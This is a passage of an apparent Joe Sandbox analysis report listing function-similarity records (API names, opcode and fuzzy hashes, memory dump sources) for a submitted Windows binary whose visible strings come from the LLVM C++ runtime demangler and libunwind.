                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc$malloc
                                      • String ID:
                                      • API String ID: 454241450-0
                                      • Opcode ID: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
                                      • Instruction ID: 754ec965bf19226520b1e70d7f1c938052b1994116681cc9082eb10399175809
                                      • Opcode Fuzzy Hash: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
                                      • Instruction Fuzzy Hash: 3971F6B2B0AB9582EB258F16E84466C7361EB58BC0F158531DF9D477A2DF3CE5928300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
                                      • Instruction ID: 47e2e836bbda47d15c48fa8cad60b7608ad1427ad0fa2f5fd2ba6167c231af79
                                      • Opcode Fuzzy Hash: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
                                      • Instruction Fuzzy Hash: A57186B2A0AB4582EA25CF56E99026DB362EB54BC0F55C431DF9E47792EF3CE491C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$std$struct
                                      • API String ID: 2803490479-3902771045
                                      • Opcode ID: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
                                      • Instruction ID: 6d858c81863022d8791cdd85bfcf101aa877de0a860f4c05315884caf3add96c
                                      • Opcode Fuzzy Hash: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
                                      • Instruction Fuzzy Hash: CC31E562B0AA8245FB559F15DA4477927A6EB04FD0F298531CE5C8B3D2DF3CE592C310
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: Once$ExecuteInit
                                      • String ID: cannot create thread specific key for __cxa_get_globals()$cannot zero out thread value for __cxa_get_globals()$execute once failure in __cxa_get_globals_fast()
                                      • API String ID: 689400697-2130391284
                                      • Opcode ID: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
                                      • Instruction ID: 4f66c5d461b31211257f055290a4597701beac6e9ed0a2449460f6ca16b0abfd
                                      • Opcode Fuzzy Hash: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
                                      • Instruction Fuzzy Hash: 32213261E1A50282EA54AF56EE951B42377AF98390FB80930DE1DC67E3EE3CB555D300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: +
                                      • API String ID: 39653677-2126386893
                                      • Opcode ID: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
                                      • Instruction ID: c368be71144239f12d96fe986ce7c91f3ff0b44cd0f2bf4d347be9040b120a42
                                      • Opcode Fuzzy Hash: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
                                      • Instruction Fuzzy Hash: C451D86261C2864BE7748E25E25067E77B2EB51764F184139EB9A87BC6CF2CF511CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: +
                                      • API String ID: 39653677-2126386893
                                      • Opcode ID: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
                                      • Instruction ID: 45abf251af613c4a28d32260ab3df232778b0a82524029f836939d4def036983
                                      • Opcode Fuzzy Hash: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
                                      • Instruction Fuzzy Hash: 9551B763A1D2424BE7388E25E19067EB7A2EB11790F184135EBDA87BC7DF2CE541CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: CaptureContextgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_init_local(cursor=%p, context=%p)
                                      • API String ID: 2386080382-2955335536
                                      • Opcode ID: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
                                      • Instruction ID: aafcfbfe00b07066239e878969d83ee3f045185c499c72d00b24fb2b5be71535
                                      • Opcode Fuzzy Hash: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
                                      • Instruction Fuzzy Hash: 85613F21909AC092F32A4B2CA5057F5B3B4FF94355F146221EFD912761FF3AA6E6C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memset$fputc
                                      • String ID: 0
                                      • API String ID: 2903701566-4108050209
                                      • Opcode ID: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
                                      • Instruction ID: ef643fdf721ec3c1bcd468a830ddd0ad78ad95323c837dabde7c60e31039eb8e
                                      • Opcode Fuzzy Hash: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
                                      • Instruction Fuzzy Hash: 6F419F53E1E28246F77A4E2A95C43796693AF19794F2C9130CE6AD67D3EE3CE9408300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx)
                                      • API String ID: 1137233558-2498214732
                                      • Opcode ID: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
                                      • Instruction ID: 5c7f2f5d7a81b0628238d82fb56af1069b06970fe231f115ca69e4cfcfcbd5f4
                                      • Opcode Fuzzy Hash: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
                                      • Instruction Fuzzy Hash: FB319626A0D65541EB10DF1AE8502793766AF99FD5F284132CE5E437E2DE3CD886C300
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: CCG
                                      • API String ID: 0-1584390748
                                      • Opcode ID: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
                                      • Instruction ID: 775b64dd43175dc69b368bcbdfbd0c27f8fc92815d00ae9bfb484eff5f0ba559
                                      • Opcode Fuzzy Hash: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
                                      • Instruction Fuzzy Hash: 50216B21E0E10241FA795B29979437D2163DF94764F3C8635CA2EC73DBDD6CA8C29241
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: mallocstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 770973918-3503049562
                                      • Opcode ID: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
                                      • Instruction ID: 121d2432d931cabd3cc9c7670c9b904fbf047af4b555babcf9664f77c86b83bf
                                      • Opcode Fuzzy Hash: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
                                      • Instruction Fuzzy Hash: 7331E032A1978286EA15CF24D5443A837A6EB45B41F294635DE5C8B3E3EF3CF6868300
                                      APIs
                                      Strings
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6099C1E5C
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6099C1E55
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: malloc$_assertstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 3012236610-3503049562
                                      • Opcode ID: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
                                      • Instruction ID: 59a28caef9fbf7784db25128393e9354cba6fb2d650390dc383d12fcc28bdbcd
                                      • Opcode Fuzzy Hash: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
                                      • Instruction Fuzzy Hash: 0321E73260A74189EB55CF14E4487AD37A9EB05B80F690636EE5D877A2DF3CE546C310
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: [enable$_if:
                                      • API String ID: 471065373-3342140569
                                      • Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
                                      • Instruction ID: c2a7ff54ec4b7d2e2a1cd84b7ea0cd5774d5539529b58c1ed8ab7d18242774c2
                                      • Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
                                      • Instruction Fuzzy Hash: 1E1187F2A0AB8683DE189F06F95426DA766EB54BC0F54C931CB8E47792EF3CE4418300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p)
                                      • API String ID: 1137233558-3294674404
                                      • Opcode ID: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
                                      • Instruction ID: 3e72624d4273db5f485b76e497f58ffadefe8716ded654b24eaa5ff87460f7be
                                      • Opcode Fuzzy Hash: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
                                      • Instruction Fuzzy Hash: 94119421F0B64682F7149F26E95027837666F98B94F2C4035CD5EC37A2DE3CA8868300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: memcpyrealloc
                                      • String ID: false$true
                                      • API String ID: 2500458235-2658103896
                                      • Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
                                      • Instruction ID: 0aa838aff02859198fef2fa071e1529e5665c1b2ae84deee61acebe95395b169
                                      • Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
                                      • Instruction Fuzzy Hash: 2001B5E2E0AA4642FB189F52E9903A96362AB547C0F688831CA5C47793EE2CD4918300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
                                      • API String ID: 1137233558-3584756005
                                      • Opcode ID: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
                                      • Instruction ID: b6f6c7361e4a01b6ebbbc77493d876abdfdec2728ecd3c418ffb18d742ca629e
                                      • Opcode Fuzzy Hash: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
                                      • Instruction Fuzzy Hash: CB11E151E0F69642FB149F23AD152B52B926F95BD0F280036DD1E97BE3EE3CA9428300
                                      APIs
                                        • Part of subcall function 00007FF6099B8C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6099B4D18,?,?,?,00007FF6099B2E71,?,?,00007FF609ADCC48,00000000,00007FF6099B1609), ref: 00007FF6099B8C11
                                      • FlsGetValue.KERNEL32(?,?,?,00007FF6099B2E71,?,?,00007FF609ADCC48,00000000,00007FF6099B1609,?,?,?,?,00007FF6099B1315), ref: 00007FF6099B4D22
                                        • Part of subcall function 00007FF6099B8C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF6099B4E16), ref: 00007FF6099B8C94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1913743852.00007FF6099B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6099B0000, based on PE: true
                                      • Associated: 00000000.00000002.1913707669.00007FF6099B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913808085.00007FF6099D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913836801.00007FF6099E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1913872712.00007FF6099E4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914063623.00007FF609ADC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914119376.00007FF609ADF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1914147850.00007FF609AE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff6099b0000_sE5IdDeTp2.jbxd
                                      Similarity
                                      • API ID: OnceValue$ExecuteInitcallocmemset
